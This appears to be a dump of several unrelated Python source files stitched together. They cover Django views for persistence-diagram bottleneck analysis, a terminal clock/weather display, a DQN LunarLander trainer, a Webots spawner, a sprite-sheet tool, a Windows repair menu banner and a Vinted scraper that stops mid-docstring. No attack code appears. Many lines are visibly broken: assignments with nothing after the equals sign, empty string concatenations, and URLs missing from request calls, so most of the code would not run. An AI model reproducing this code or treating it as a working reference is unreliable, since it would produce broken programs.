research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ).first()) if type(self.analysis) is FiltrationAnalysis: windows = FiltrationWindow.objects.filter( analysis=self.analysis ) elif type(self.analysis) is MapperAnalysis: windows = MapperWindow.objects.filter( analysis=self.analysis ) return windows.only('name', 'creation_date', 'slug').order_by('name') class WindowBottleneckView(View): def get(self, request, *args, **kwargs): my_analysis = get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) my_window = get_object_or_404( FiltrationWindow, analysis=my_analysis, slug=self.kwargs['window_slug'] ) my_window.bottleneck_calculation_onetoall(self.kwargs['homology']) bottleneck = my_window.get_bottleneck(self.kwargs['homology']) diagram_list = bottleneck.get_diagrams() page = request.GET.get('page', 1) paginator = Paginator(diagram_list, 10) try: diagrams = except PageNotAnInteger: diagrams = except EmptyPage: diagrams = return render(request, 'analysis/window/filtrationwindow_bottleneck.html', context={'diagrams': diagrams, 'window': my_window}) class AnalysisConsecutiveBottleneckView(View): def get(self, request, *args, **kwargs): my_analysis = get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) my_analysis.bottleneck_calculation_consecutive(self.kwargs['homology']) bottleneck = my_analysis.get_bottleneck(Bottleneck.CONS, self.kwargs['homology']) diagram_list = bottleneck.get_diagrams() page = request.GET.get('page', 1) paginator = Paginator(diagram_list, 10) try: diagrams = except PageNotAnInteger: diagrams = except EmptyPage: diagrams = return render(request, 'analysis/filtrationanalysis_bottleneck_consecutive.html', context={'diagrams': diagrams, 'analysis': my_analysis }) class AnalysisAlltoallBottleneckView(View): def get(self, request, *args, **kwargs): my_analysis = get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) my_analysis.bottleneck_calculation_alltoall(self.kwargs['homology']) bottleneck = my_analysis.get_bottleneck(Bottleneck.ALL, self.kwargs['homology']) diagram_list = bottleneck.get_diagrams() page = request.GET.get('page', 1) paginator = Paginator(diagram_list, 10) try: diagrams = except PageNotAnInteger: diagrams = except EmptyPage: diagrams = return render(request, 'analysis/filtrationanalysis_bottleneck_alltoall.html', context={'diagrams': diagrams, 'analysis': my_analysis }) class RipserDownloadView(VirtualDownloadView): def get_object(self): my_analysis = get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) return get_object_or_404( FiltrationWindow, analysis=my_analysis, slug=self.kwargs['window_slug'] ) def get_file(self): window_analysis = self.get_object() return ContentFile(window_analysis.result_matrix, + '_' + + '_' + str( + '.dat') class EntropyDownloadView(VirtualDownloadView): def get_object(self): return get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) def get_file(self): analysis = self.get_object() return ContentFile(analysis.get_entropy_csv(), + '_' + + '_entropy.csv') class BottleneckONEDownloadView(VirtualDownloadView): def get_object(self): my_analysis = get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) my_window = get_object_or_404( FiltrationWindow, analysis=my_analysis, slug=self.kwargs['window_slug'] ) return get_object_or_404( Bottleneck, window=my_window, kind=Bottleneck.ONE, homology=self.kwargs['homology'] ) def get_file(self): bottleneck = self.get_object() return ContentFile(bottleneck.get_bottleneck_matrix(), + '_' + + '_' + str( + '_bottleneck_distance_one_to_all_H' + str(bottleneck.homology) + '.csv') class BottleneckALLDownloadView(VirtualDownloadView): def get_object(self): my_analysis = get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) return get_object_or_404( Bottleneck, analysis=my_analysis, kind=Bottleneck.ALL, homology=self.kwargs['homology'] ) def get_file(self): bottleneck = self.get_object() return ContentFile(bottleneck.get_bottleneck_matrix(), + '_' + + '_bottleneck_distance_all_to_all_H' + str(bottleneck.homology) + '.csv') class BottleneckCONSDownloadView(VirtualDownloadView): def get_object(self): my_analysis = get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) return get_object_or_404( Bottleneck, analysis=my_analysis, kind=Bottleneck.CONS, homology=self.kwargs['homology'] ) def get_file(self): bottleneck = self.get_object() return ContentFile(bottleneck.get_bottleneck_matrix(), + '_' + + '_bottleneck_distance_consecutive_H' + str(bottleneck.homology) + '.csv') def AnalysisBottleneckCreateView(request, research_slug, analysis_slug): research = get_object_or_404(Research, slug=research_slug) analysis = get_object_or_404(FiltrationAnalysis, research=research, slug=analysis_slug) # if this is a POST request we need to process the form data if request.method == 'POST': # create a form instance and populate it with data from the request: form = AnalysisBottleneckCreationForm(analysis.max_homology_dimension, request.POST) # check whether it's valid: if form.is_valid(): cleaned_data = form.cleaned_data bottleneck_type = cleaned_data.get("bottleneck_type") homology = cleaned_data.get("homology") if bottleneck_type == Bottleneck.CONS: return redirect('analysis:analysis-bottleneck-consecutive', homology=homology, analysis_slug=analysis.slug, research_slug=research.slug) elif bottleneck_type == Bottleneck.ALL: return redirect('analysis:analysis-bottleneck-alltoall', homology=homology, analysis_slug=analysis.slug, research_slug=research.slug) # if a GET (or any other method) we'll create a blank form else: form = AnalysisBottleneckCreationForm(analysis.max_homology_dimension) return render(request, 'analysis/analysis_bottleneck_form.html', {'form': form, 'research': research, 'analysis': analysis}) def WindowBottleneckCreateView(request, research_slug, analysis_slug, window_slug): research = get_object_or_404(Research, slug=research_slug) analysis = get_object_or_404(FiltrationAnalysis, research=research, slug=analysis_slug) window = get_object_or_404(FiltrationWindow, analysis=analysis, slug=window_slug) # if this is a POST request we need to process the form data if request.method == 'POST': # create a form instance and populate it with data from the request: form = WindowBottleneckCreationForm(analysis.max_homology_dimension, request.POST) # check whether it's valid: if form.is_valid(): cleaned_data = form.cleaned_data homology = cleaned_data.get("homology") return redirect('analysis:window-bottleneck-onetoall', homology=homology, window_slug=window.slug, analysis_slug=analysis.slug, research_slug=research.slug) # if a GET (or any other method) we'll create a blank form else: form = WindowBottleneckCreationForm(analysis.max_homology_dimension) return render(request, 'analysis/window/window_bottleneck_form.html', {'form': form, 'research': research, 'analysis': analysis, 'window': window}) class ALLBottleneckDeleteView(DeleteView): model = Bottleneck context_object_name = 'bottleneck' template_name = "analysis/bottleneck_confirm_delete_ALL.html" def get_object(self): my_analysis = get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) return get_object_or_404( Bottleneck, analysis=my_analysis, homology=self.kwargs['homology'], kind=Bottleneck.ALL ) def get_success_url(self): return reverse_lazy('analysis:analysis-detail', kwargs={ 'research_slug': self.kwargs['research_slug'], 'analysis_slug': self.kwargs['analysis_slug'] }) class CONSBottleneckDeleteView(DeleteView): model = Bottleneck context_object_name = 'bottleneck' template_name = "analysis/bottleneck_confirm_delete_CONS.html" def get_object(self): my_analysis = get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) return get_object_or_404( Bottleneck, analysis=my_analysis, homology=self.kwargs['homology'], kind=Bottleneck.CONS ) def get_success_url(self): return reverse_lazy('analysis:analysis-detail', kwargs={ 'research_slug': self.kwargs['research_slug'], 'analysis_slug': self.kwargs['analysis_slug'] }) class ONEBottleneckDeleteView(DeleteView): model = Bottleneck context_object_name = 'bottleneck' template_name = "analysis/window/bottleneck_confirm_delete_ONE.html" def get_object(self): my_analysis = get_object_or_404( FiltrationAnalysis, research__slug=self.kwargs['research_slug'], slug=self.kwargs['analysis_slug'] ) my_window = get_object_or_404( FiltrationWindow, analysis=my_analysis, slug=self.kwargs['window_slug'] ) return get_object_or_404( Bottleneck, window=my_window, homology=self.kwargs['homology'], kind=Bottleneck.ONE ) def get_success_url(self): return reverse_lazy('analysis:window-detail', kwargs={ 'research_slug': self.kwargs['research_slug'], 'analysis_slug': self.kwargs['analysis_slug'], 'window_slug': self.kwargs['window_slug'] }) ```
{ "source": "098799/monitour", "score": 3 }
#### File: 098799/monitour/ ```python import datetime import os import os.path import requests import time temp_refresh_rate = 1000 temp_location = "barcelona" def addon(which): if which in (1, 21, 31): return "st" elif which in (2, 22): return "nd" elif which in (3, 23): return "rd" else: return "th" def center(string): padding = (terminal_width - len(string))//2 return padding * " " + string + padding * " " def fineprint(outlist): out = "|" + " " * 2 padding = "|" + " " * 2 for item in outlist: out += item out += 2* " " + "|" + 2 * " " padding += " " * len(item) padding += 2* " " + "|" + 2 * " " out = out[:-2] padding = padding[:-2] print("\n" * ((int(terminal_height)-9)//2)) print(center(ul(out))) print(center(padding)) print(center(out)) print(center(padding)) print(center(ul(out))) print("\n" * ((int(terminal_height)-7)//2)) def ul(string): return "+" +"-" * (len(string)-2) + "+" def check_temperature(): file_name = "/tmp/outside_temperature" if os.path.exists(file_name): modified = os.path.getmtime(file_name) if (time.time() - modified) < temp_refresh_rate: with open(file_name, 'r') as infile: temperature = return temperature rr = requests.get(" item.condition.temp from weather.forecast where woeid in (select woeid from geo.places(1) where text%3D%22{0}%22)&format=json&".format(temp_location)) temp = rr.json()['query']['results']['channel']['item']['condition']['temp'] temperature = str((int(temp)-32)*5//9)+ "°C" with open(file_name, 'w') as outfile: outfile.write(temperature) return temperature check_temperature() today = terminal_width = os.get_terminal_size().columns terminal_height = os.get_terminal_size().lines today_date = str(today.strftime("%A, %-d" + addon( + " of %B")) now_time = str(today.strftime("%-H:%M")) fineprint([today_date, now_time, check_temperature()]) ```
{ "source": "09jvilla/CS234_gym", "score": 3 }
#### File: CS234_gym/vanilla_DoubleDQN/ ```python import gym import random import torch import numpy as np from collections import deque import matplotlib.pyplot as plt import pdb # ### 2. Instantiate the Environment and Agent # # Initialize the environment in the code cell below. # In[2]: env = gym.make('LunarLander-v2') env.sparse_rewards=True env.seed(0) print('State shape: ', env.observation_space.shape) print('Number of actions: ', env.action_space.n) # Please refer to the instructions in `Deep_Q_Network.ipynb` if you would like to write your own DQN agent. Otherwise, run the code cell below to load the solution files. # In[3]: from dqn_agent import Agent agent = Agent(state_size=8, action_size=4, seed=0, enable_curiosity=False) # watch an untrained agent state = env.reset() for j in range(200): action = agent.act(state) env.render() state, reward, done, _ = env.step(action) if done: break env.close() # ### 3. Train the Agent with DQN # # Run the code cell below to train the agent from scratch. You are welcome to amend the supplied values of the parameters in the function, to try to see if you can get better performance! # # Alternatively, you can skip to the next step below (**4. Watch a Smart Agent!**), to load the saved model weights from a pre-trained agent. # In[4]: def dqn(n_episodes=2000, max_t=1000, eps_start=1.0, eps_end=0.01, eps_decay=0.995): """Deep Q-Learning. Params ====== n_episodes (int): maximum number of training episodes max_t (int): maximum number of timesteps per episode eps_start (float): starting value of epsilon, for epsilon-greedy action selection eps_end (float): minimum value of epsilon eps_decay (float): multiplicative factor (per episode) for decreasing epsilon """ scores = [] # list containing scores from each episode scores_window = deque(maxlen=100) # last 100 scores eps = eps_start # initialize epsilon for i_episode in range(1, n_episodes+1): state = env.reset() score = 0 for t in range(max_t): action = agent.act(state, eps) next_state, reward, done, _ = env.step(action) agent.step(state, action, reward, next_state, done) state = next_state score += reward if done: break scores_window.append(score) # save most recent score scores.append(score) # save most recent score eps = max(eps_end, eps_decay*eps) # decrease epsilon print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window)), end="") if i_episode % 100 == 0: print('\rEpisode {}\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_window))) if np.mean(scores_window)>=200.0: print('\nEnvironment solved in {:d} episodes!\tAverage Score: {:.2f}'.format(i_episode-100, np.mean(scores_window))), 'checkpoint.pth') break return scores scores = dqn() fig=plt.figure() ax = fig.add_subplot(111) l1 = [tup[0] for tup in agent.loss_list] l2 = [tup[1] for tup in agent.loss_list] l3 = [tup[2] for tup in agent.loss_list] plt.plot(np.arange(len(agent.loss_list)), l1) plt.plot(np.arange(len(agent.loss_list)), l2) plt.plot(np.arange(len(agent.loss_list)), l3) plt.legend(["loss1","loss2","loss3"]) # plot the scores fig = plt.figure() ax = fig.add_subplot(111) plt.plot(np.arange(len(scores)), scores) plt.ylabel('Score') plt.xlabel('Episode #') # ### 4. Watch a Smart Agent! # # In the next code cell, you will load the trained weights from file to watch a smart agent! # In[ ]: """ # load the weights from file agent.qnetwork_local.load_state_dict(torch.load('checkpoint.pth')) for i in range(3): state = env.reset() for j in range(200): action = agent.act(state) env.render() state, reward, done, _ = env.step(action) if done: break env.close() """ # ### 5. Explore # # In this exercise, you have implemented a DQN agent and demonstrated how to use it to solve an OpenAI Gym environment. To continue your learning, you are encouraged to complete any (or all!) of the following tasks: # - Amend the various hyperparameters and network architecture to see if you can get your agent to solve the environment faster. Once you build intuition for the hyperparameters that work well with this environment, try solving a different OpenAI Gym task with discrete actions! # - You may like to implement some improvements such as prioritized experience replay, Double DQN, or Dueling DQN! # - Write a blog post explaining the intuition behind the DQN algorithm and demonstrating how to use it to solve an RL environment of your choosing. ```
{ "source": "09labs/rocket", "score": 2 }
#### File: calls/auth/ ```python import logging from rocketchat.calls.base import RocketChatBase logger = logging.getLogger(__name__) class GetMe(RocketChatBase): endpoint = '/api/v1/me' def build_endpoint(self, **kwargs): return self.endpoint def post_response(self, result): return result ```
{ "source": "09ubberboy90/lvl4-ros2-sim-comp", "score": 2 }
#### File: sim_spawner/sim_spawner/ ```python import rclpy import os import sys from webots_ros2_core.webots_node import WebotsNode from webots_ros2_core.utils import append_webots_python_lib_to_path from webots_ros2_core.trajectory_follower import TrajectoryFollower from sensor_msgs.msg import JointState from ament_index_python.packages import get_package_share_directory from geometry_msgs.msg import Pose, Point, Quaternion from gazebo_msgs.srv import GetEntityState, GetModelList from gazebo_msgs.msg import EntityState import pyquaternion try: append_webots_python_lib_to_path() from controller import Node except Exception as e: sys.stderr.write('"WEBOTS_HOME" is not correctly set.') raise e class SpawnerNode(WebotsNode): def __init__(self, args=None): super().__init__("spawner", args) self.package_dir = get_package_share_directory('webots_simple_arm') self.children = self.robot.getRoot().getField("children") self.entity = self.create_service( GetEntityState, 'get_entity_state', self.get_entity_state) self.model = self.create_service( GetModelList, 'get_model_list', self.get_model_list) self.objs = {} self.robot.simulationSetMode(self.robot.SIMULATION_MODE_FAST) self.spawn_obj("worlds/Table.wbo", rotation = [1,0,0,1.57]) self.spawn_obj("worlds/Cube.wbo", position = [0.3-0.6, 0, 0.55]) # for x in range(-4, 5): # for y in range(-4, 5): # if x == 0.3 and y == 0: # continue # self.spawn_obj("worlds/Cube.wbo", [x/10, y/10, 0.55]) def spawn_obj(self, path, position=[0, 0, 0], offset=[0.6, 0, 0], rotation = [0,1,0,0]): out = [] for i, j in zip(position, offset): out.append(i+j) self.children.importMFNode(0, os.path.join(self.package_dir, path)) obj = self.children.getMFNode(0) obj.getField("translation").setSFVec3f(out) obj.getField("rotation").setSFRotation(rotation) self.objs[obj.getField("name").getSFString()] = obj def get_model_list(self, request: GetModelList.Request, response: GetModelList.Response): response.model_names = list(self.objs.keys()) response.success = True return response def get_entity_state(self, request: GetEntityState.Request, response: GetEntityState.Response): obj = self.objs.get( if obj is None: response.success = False return response state = EntityState() = pose = Pose() pose.position = self.get_postion(obj) pose.orientation = self.get_rotation(obj) state.pose = pose response.state = state response.success = True return response def get_postion(self, obj): position = Point() obj_pose = obj.getField("translation").getSFVec3f() position.x = obj_pose[0] position.y = obj_pose[1] position.z = obj_pose[2] return position def get_rotation(self, obj): rotation = Quaternion() obj_rot = obj.getField("rotation").getSFRotation() quat = pyquaternion.Quaternion(axis=obj_rot[:3], angle=obj_rot[3]) rotation.x = float(quat.x) rotation.y = float(quat.y) rotation.z = float(quat.z) rotation.w = float(quat.w) return rotation def main(args=None): rclpy.init(args=args) os.environ['WEBOTS_ROBOT_NAME'] = "spawner" spawner = SpawnerNode(args=args) rclpy.spin(spawner) rclpy.shutdown() if __name__ == '__main__': main() ```
{ "source": "0a0r/PersonalTools", "score": 3 }
#### File: 0a0r/PersonalTools/ ```python import cv2 import os import numpy as np import sys def GetDesiredWidthAndHeight(spritesCnt): bits = spritesCnt.bit_length() width = 1 height = 1 if spritesCnt != (1 << (bits - 1)): bits += 1 if bits & 1: width = (1 << (bits >> 1)) height = width else: width = (1 << (bits >> 1)) height = width >> 1 return (width, height) def GetIndexByCoords(width, height, imgWidth): return height * imgWidth + width def GenerateSpriteSheet(inputPath, outputPath): spritesFilePaths = [] # Read all files path from input path for root, dirs, files, in os.walk(inputPath): for file in files: if file.endswith('.png'): spritesFilePaths.append(os.path.join(root, file)) # Empty list spritesList = [] spritesCnt = len(spritesFilePaths) if spritesCnt == 0: return for i in range(0, spritesCnt): sprite = cv2.imread(spritesFilePaths[i], cv2.IMREAD_UNCHANGED) spritesList.append(sprite) (imgWidth, imgHeight, imgCol) = spritesList[0].shape (spriteSheetWidthCnt, spriteSheetHeightCnt) = GetDesiredWidthAndHeight(spritesCnt) spriteSheetResult = np.zeros spriteEmptyPlaceholder = np.full((imgWidth, imgHeight, 4), (255, 255, 255, 0), np.uint8) for h in range(0, spriteSheetHeightCnt): spriteSheetHorizontalResult = spriteEmptyPlaceholder for w in range(0, spriteSheetWidthCnt): indx = GetIndexByCoords(w, h, spriteSheetWidthCnt) spriteSheetCurrent = spriteEmptyPlaceholder if indx < spritesCnt: spriteSheetCurrent = spritesList[indx] if w == 0: spriteSheetHorizontalResult = spriteSheetCurrent else: spriteSheetHorizontalResult = cv2.hconcat([spriteSheetHorizontalResult, spriteSheetCurrent]) if h == 0: spriteSheetResult = spriteSheetHorizontalResult else: spriteSheetResult = cv2.vconcat([spriteSheetResult, spriteSheetHorizontalResult]) filePrefix = inputPath.split('\\')[-1] cv2.imwrite(os.path.join(outputPath, filePrefix + '_Output.png'), spriteSheetResult) if __name__ == "__main__": GenerateSpriteSheet(sys.argv[1], sys.argv[2]) ```
{ "source": "0AliReza0/WindowsMedicator", "score": 3 }
#### File: WindowsMedicator/WindowsMedicator(exe)/ ```python import ctypes import platform from colorama.ansi import Fore """ This Class Needs Access to System For Scanning Your System's Health """ class RunProgramAsAdmin: def IsAdmin(): if (platform.system()[0].upper() in ["W"]): try: return ctypes.windll.shell32.IsUserAnAdmin() except: return False class ScriptHeaders: def ShowHeaders(): ASCII = """{0} /////////////. ,///////////// /////////////////// ./////////////////// /////////////////////// /////////////////////// ///////////////////////////////////////////////// /////////////////// //////////////////////////// ////////////////// //////. /////////////////// ///////////////// ,//// .///////////////// //////////////// /// ,///////////////. .///////////// , / , ,,, ,,, ,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,,. ,,,,,,,,,,,,, ,,,,,,,,,,,,,, ,,,,,,,,,,, ,,,,,,,,,,,, ,,,,,,,,,,,,,,,,,,,,, ,,,,,,,,,,,,,,, ,,,,,,,,,, ,,,,, ,,, {1} Version : 2.0.0 """.format(Fore.GREEN , Fore.WHITE) print(f"{ASCII}\n") print(f"{Fore.MAGENTA}[{Fore.GREEN}+{Fore.MAGENTA}] {Fore.WHITE}Windows Medicator Created By shervinbdndev\n\n\n") print(f"\t{Fore.GREEN}[ Safe Zone ]") print(f"{Fore.MAGENTA}[{Fore.GREEN}1{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Check System's Health") print(f"{Fore.MAGENTA}[{Fore.GREEN}2{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Scan System's Health") print(f"{Fore.MAGENTA}[{Fore.GREEN}3{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Restore System's Health") print(f"{Fore.MAGENTA}[{Fore.GREEN}4{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Repair install.esd Image") print(f"{Fore.MAGENTA}[{Fore.GREEN}5{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Repair windows Installation Image") print(f"{Fore.MAGENTA}[{Fore.GREEN}6{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Check System's Disks") print(f"{Fore.MAGENTA}[{Fore.GREEN}7{Fore.MAGENTA}] {Fore.CYAN}(FIX) {Fore.WHITE}Internet Connection Problem\n\n") print(f"\t{Fore.RED}[ Danger Zone ]") print(f"{Fore.MAGENTA}[{Fore.GREEN}8{Fore.MAGENTA}] {Fore.YELLOW}(DANGER) {Fore.WHITE}Uninstall & Delete All Windows Builtins Apps") print(f"{Fore.MAGENTA}[{Fore.GREEN}9{Fore.MAGENTA}] {Fore.RED}(DANGER) {Fore.WHITE}Reset Factory PC\n\n") print(f"{Fore.MAGENTA}[{Fore.GREEN}99{Fore.MAGENTA}] {Fore.WHITE}Exit") ```
{ "source": "0AlphaZero0/Vinted-data", "score": 2 }
#### File: 0AlphaZero0/Vinted-data/ ```python import requests import json import re # api_url = "" url = "[]=&color_id[]=" url_search_txt = "" # brands_url = "" # catalogs_url = "" data_repository = "./DATA/" applicationJSON = r'<script type="application/json" data-js-react-on-rails-store="MainStore">([^<]+)</script>' id_supported = { "catalog":{ "regex":applicationJSON, "nested":"catalogs", "names":["title","code"], "mainStore":"catalogs", "url_name":"catalog[]" }, "color":{ "regex":applicationJSON, "names":["title","code"], "mainStore":"colors", "url_name":"color_id[]" }, "brand":{ "names":["title","slug"], "url_name":"brand_id[]" }, "size":{ "regex":applicationJSON, "nested":"sizes", "names":["title"], "only_string":True, "mainStore":"sizeGroups", "url_name":"size_id[]" }, "material":{ "regex":applicationJSON, "nested":"materials", "names":["title","code"], "mainStore":"materialGroups", "url_name":"material_id[]" }, "status":{ "regex":applicationJSON, "names":["title"], "mainStore":"statuses", "url_name":"status_id[]" } # "country":{ # "regex":applicationJSON, # "names":["title","title_local","iso_code"], # "mainStore":"countries", # "url_name":"country_id[]" # } } def JSONfromID(id_names=[x for x in id_supported],id_range=range(0,100),per_page=24,save=False,empty_ids=False): """ This function will extract information from Vinted about the ids requested. Parameters ---------- id_names : LIST or STRING, optional This parameter indicate which ids you want to extract from Vinted. The default is ["catalog","color","brand","size","material","status","country"]. id_range : RANGE, optional This parameter is used to extract a range of ids for example from 0 to 1000. This parameter is only used to extract brand ids. The default is range(0,100). per_page : INTEGER, optional This parameter is the number of item per page in the resulting response the best to extract ids corresponds to 24. The default is 24. save : BOOLEAN, optional This parameter is used to saved ids found in the DATA folder, as following : ./DATA/*id_name*.json. The default is False. empty_ids : BOOLEAN, optional This parameter is used only for the brand id results. Indeed some brands ids point to nothing, if you want those empty ids in your results set this parameter to True. The default is False. Returns ------- collected_data : DICTIONARY This dictrionary will contains every ids found. For example if the id_names parameter was ["color","status"] the dictionary will look like this : { "color":[ { "id": 1, "title": "Noir", "hex": "000000", "order": 1, "code": "BLACK" }, { "id": 3, "title": "Gris", "hex": "919191", "order": 2, "code": "GREY" }, . . . ], "status":[ { "id": 6, "title": "Neuf avec \u00e9tiquette", "description": "Article neuf, jamais port\u00e9/utilis\u00e9 avec \u00e9tiquettes ou dans son emballage d\u2019origine.", "explanation": "Article neuf, jamais port\u00e9/utilis\u00e9 avec \u00e9tiquettes ou dans son emballage d\u2019origine.", "explanation_title": "Cet article est flambant neuf ?", "is_default": 0, "order": 5 }, { "id": 1, "title": "Neuf sans \u00e9tiquette", "description": "Article neuf, jamais port\u00e9/utilis\u00e9, sans \u00e9tiquettes ni emballage d\u2019origine.", "explanation": "Article neuf, jamais port\u00e9/utilis\u00e9, sans \u00e9tiquettes ni emballage d\u2019origine.", "explanation_title": "L\u2019article n\u2019a plus d\u2019\u00e9tiquette, mais il n\u2019a jamais \u00e9t\u00e9 port\u00e9 ?", "is_default": 0, "order": 10 }, . . . ] } """ def brandIds(id_name,id_supported,id_range=id_range,per_page=per_page,empty_ids=empty_ids): """ This function will extract a range of brand ids from Vinted and their corresponding information. Parameters ---------- id_name : STRING This parameter is not used here but essential. id_supported : DICTIONARY This parameter is not used here but essential. id_range : RANGE, optional This parameter is used to extract a range of ids for example from 0 to 1000. This parameter is only used to extract brand ids. The default is range(0,100). per_page : INTEGER, optional This parameter is the number of item per page in the resulting response the best to extract ids corresponds to 24. The default is 24. empty_ids : BOOLEAN, optional This parameter is used only for the brand id results. Indeed some brands ids point to nothing, if you want those empty ids in your results set this parameter to True. The default is False. Returns ------- id_DATA : LIST This list will contains every brand ids found and their corresponding information. """ def chunks(lst, n): """ This function will create sublists of size n from the list lst. Parameters ---------- lst : LIST This parameter is not used here but essential. n : INTEGER This parameter is not used here but essential. Returns ------- None """ for i in range(0, len(lst), n): yield lst[i:i + n] chunk_size = 50 id_DATA = [] ids_to_scan = chunks([i for i in id_range],chunk_size) x = 0 for chunk in ids_to_scan: x += 1 chunk = [str(s) for s in chunk] new_url = url_search_txt+"&brand_id[]="+"&brand_id[]=".join(chunk) req = requests.get(new_url).text brands = re.findall(r"({\"id\":[0-9]+,\"title\":\"[^\"]+\",\"slug\":[^}]+})", req) for brand in brands: brand = json.loads(brand) if brand not in id_DATA: id_DATA.append(brand) print("#######################\n"+id_name.split("_")[0].capitalize()+" ID Extraction...") print(new_url) print("Ids processed : "+str(x*chunk_size)) print("IDs found : "+str(len(id_DATA))) return id_DATA def params(id_supported,id_names=id_names): """ This function will format the id_names as a list. Parameters ---------- id_names : STRING or LIST, optional A list or string that should correpond to one of the supported Vinted IDs. The default is id_names. id_supported : DICTIONARY A dictionary containing supported Vinted IDs and their corresponding information Returns ------- id_names : LIST A list of supported Vinted IDs. """ def check_supported_ids(id_names=id_names,id_supported=id_supported): """ This function will check if all ids in id_name are supported. Parameters ---------- id_names : list, optional A list or string that should correpond to one of the supported Vinted IDs. The default is id_names. id_supported : TYPE, optional A dictionary containing supported Vinted IDs and their corresponding information. The default is id_supported. Returns ------- BOOLEAN """ id_not_supported = [] for i in id_names: if i not in id_supported: id_not_supported.append(i) if len(id_not_supported) != 0: raise(f'Following ids are not supported currently ({id_names}), please check supported ids.\n {str_id_supp}') return True if isinstance(id_names, str) and id_names in id_supported: return [id_names] if isinstance(id_names, list) and check_supported_ids(id_names,id_supported): return id_names str_id_supp = id_supported.keys() raise(f'Following id is not supported currently ({id_names}), please check supported ids.\n {str_id_supp}') def regexMatching(id_name,id_supported): """ This function will, from an ID name, extract the corresponding Python object from Vinted with a regex matching. Parameters ---------- id_name : STRING A string corresponding to a supported Vinted ID. id_supported : DICTIONARY Dictionary which contains Vinted IDs and their corresponding information. Returns ------- id_DATA : JSON - PYTHON OBJECT Python object corresponding to the JSON found in Vinted data corresponding to the id_name. """ req = requests.get(url).text id_DATA = json.loads(re.findall(id_supported[id_name]["regex"], req)[0]) if "mainStore" in id_supported[id_name]: return id_DATA["catalogFilters"]["dtos"][id_supported[id_name]["mainStore"]] return id_DATA def colorModification(id_DATA): """ This function will add the # to the hex field of the Python object corresponding to the ID color in Vinted. Parameters ---------- id_DATA : JSON - PYTHON OBJECT The python object collected for the color ID. Returns ------- id_DATA : JSON - PYTHON OBJECT The same python object collected for the color ID, but with the # in front of the hex values. """ for color in id_DATA: color["hex"] = "#"+color["hex"] return id_DATA id_supported["color"]["modification"] = colorModification id_supported["brand"]["function"] = brandIds for i in id_supported: if "regex" in id_supported[i]: id_supported[i]["function"] = regexMatching id_names = params(id_supported) collected_data = {} for id_name in id_names: id_DATA = id_supported[id_name]["function"](id_name,id_supported) if "modification" in id_supported[id_name]: id_DATA = id_supported[id_name]["modification"](id_DATA) collected_data[id_name]=id_DATA print(id_name.capitalize()+" found : "+str(len(id_DATA))) if save: for id_collected in collected_data: with open("./DATA/"+id_collected+".json",'w') as outfile: json.dump(collected_data[id_collected],outfile,indent=2) return collected_data def searchVinted(print_url=True,searchText="",catalog=[],color=[],brand=[],size=[],material=[],status=[],country=[],price_to=1000000,price_from=0,currency="EUR",per_page=120,page=1): """ This function try to a programmatic way to search for item within Vinted thanks to Vinted data extract everyday and store in the folder DATA. Parameters ---------- searchText : STRING, optional A string that will correspond to a search with the Vinted search bar. catalog : LIST, optional A list of specific IDs or catalog names. color : LIST, optional A list of specific IDs or color names. brand : LIST, optional A list of specific IDs or brand names. size : LIST, optional A list of specific IDs or size names. material : LIST, optional A list of specific IDs or material names. status : LIST, optional A list of specific IDs or status names. country : LIST, optional A list of specific IDs or country names. price_to : INTEGER, optional A maximum price fix as the max limit. price_from : INTEGER, optional A minimum price fix as the min limit. currency : STRING, optional The currency in which you want the prices. per_page : INTEGER, optional The number of items per page in your result. page : INTEGER, optional The page index. Return ------ --- : DICTIONARY This function will return a dictionary looking like : { "items": [item1,item2,item3,item4,...,itemN], "searchParams":{Parameters of the search within Vinted} } """ def matchingIDs(ID_name,IDs): """ This function will try to match the information provided as ID to the data corresponding to the ID_name. For example if we provide the ID_name 'color', we can either provide an integer ID or a string such as 'pink' for the corresponding color. Parameters ---------- ID_name : STRING An ID name corresponding to one of the supported id within id_supported. IDs : LIST A list of integer or string corresponding to IDs found within Vinted data. Return ------ IDs_requested : LIST A list of matched IDs corresponding to information provided in IDs. """ def findID(ID_name,ID,data): """ This function will try to match an ID to the 'ID' provided, it can either be an integer or a string corresponding to a term inside the title of ID for example 'rose' for the color pink. Parameters ---------- ID_name : STRING A string that correspond to one if the ID name supported (Check the dictionary id_supported). ID : STRING OR INTEGER If ID is an integer it will be consider as the ID to look for (except for sizes as these can sometimes be integer), if it is a string then the algorithm will try to match an ID based on the string provided. data : LIST A list of dictionaries corresponding to one of the JSON file in the DATA folder. Return ------ --- : LIST A list of IDs matched to the string or integer provided as ID. """ def matchNames(ID_name,ID,data): """ This function will return the corresponding ids matched to the ID provided with the parameter data and ID_name. IDs will be matched through a string matching. Parameters ---------- ID_name : STRING The name of the ID to check for example if you are looking for 'H&M' brand the ID_name should be 'brand'. ID : STRING The string provided to find within the data for example for an ID_name='brand' the ID can be 'Nike'. data : 